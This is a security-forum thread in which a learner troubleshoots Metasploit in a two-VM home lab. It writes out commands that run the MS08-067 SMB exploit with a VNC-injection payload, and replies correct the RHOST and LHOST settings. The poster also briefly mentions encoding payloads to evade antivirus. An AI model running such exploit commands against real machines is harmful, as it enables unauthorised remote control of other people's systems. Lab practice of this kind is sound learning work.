Jump to content

Vncinjecting With Metasploit


Infiltrator

Recommended Posts

Hi Community,

I've just started learning Metasploit and I am having some issues at the moment. I currently have 2 VMs, running Windows XP Pro SP2. My first VM is the target machine IP address: 192.168.1.11 and the attacker machine, IP address: 192.168.1.10

I can ping both machines and both can get onto the internet with no problems. I've downloaded the Metasploit Framework 3.4.1, installed it on the attacker machine and also updated the metasploit database.

Here is what I am trying to do, I am using VNCinjector to view the target machine but I am receiving the following error:

These are the commands I am typing:

MSF > use windows/smb/ms08_067_netapi

MSF > exploit(ms08_067_netapi) > set RHOST 192.168.1.10

MSF > exploit(ms08_067_netapi) > set PAYLOAD windows/vncinject/bind_tcp

MSF > exploit(ms08_067_netapi) > exploit

Started bind handler

Attempting to trigger the vulnerability....

Exploit completed, but no session was created.

Has anyone experienced this error before.

Link to comment
Share on other sites

Hi Community,

I've just started learning Metasploit and I am having some issues at the moment. I currently have 2 VMs, running Windows XP Pro SP2. My first VM is the target machine IP address: 192.168.1.11 and the attacker machine, IP address: 192.168.1.10

I can ping both machines and both can get onto the internet with no problems. I've downloaded the Metasploit Framework 3.4.1, installed it on the attacker machine and also updated the metasploit database.

Here is what I am trying to do, I am using VNCinjector to view the target machine but I am receiving the following error:

These are the commands I am typing:

MSF > use windows/smb/ms08_067_netapi

MSF > exploit(ms08_067_netapi) > set RHOST 192.168.1.10

MSF > exploit(ms08_067_netapi) > set PAYLOAD windows/vncinject/bind_tcp

MSF > exploit(ms08_067_netapi) > exploit

Started bind handler

Attempting to trigger the vulnerability....

Exploit completed, but no session was created.

Has anyone experienced this error before.

I'm speaking under correction, but aren't you supposed to set the LHOST as well? In your case, that should be 192.168.1.10.. Other members might help elaborate more. *ahem* mubix? :P

Edited by Michael Deats
Link to comment
Share on other sites

I'm speaking under correction, but aren't you supposed to set the LHOST as well? In your case, that should be 192.168.1.10.. Other members might help elaborate more. *ahem* mubix? :P

I'm pretty sure, I did set the LHOST to 192.168.1.10, but will try again in case I haven't. I also did a bit of researching and found out, that it could be that the vulnerability that I am trying to exploit may already be patched.

Link to comment
Share on other sites

RHOST should be the target IP, LHOST should be the attacket IP.

That's exactly what I did, I set the RHOST to the target IP and the LHOST to the attacker IP. And there still no luck. I am still getting the same error message "Exploit completed, but no session was created."

What's funny is that, I tried it with different exploits and payloads and I do occasionally get the same error.

Have you ever run into this problem before?

Edited by Infiltrator
Link to comment
Share on other sites

MSF > use windows/smb/ms08_067_netapi

MSF > exploit(ms08_067_netapi) > set RHOST 192.168.1.10

MSF > exploit(ms08_067_netapi) > set PAYLOAD windows/vncinject/bind_tcp

MSF > exploit(ms08_067_netapi) > exploit

rhost is the target machine, it should be

set RHOST 192.168.1.11

set LHOST 192.168.1.10

Link to comment
Share on other sites

OK, you confused me.

Is the victim running some form of AV/firewall?

That's a very good question and we know that most AVs and Firewalls will block these attacks and I have tried executing the attack with both the Firewall/Antivirus turned on and off and was still unable to pull the attack.

I then read the tutorial on the http://www.offensive-security.com/metasploit-unleashed/, on how to encode the payload so it does not get detected by any AVs and was still unable to exploit my target machine.

It could also mean, that because I am so security oriented and I am always patching things up, that my VM may possibly have all the latest updates.

I don't know what do you say?

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...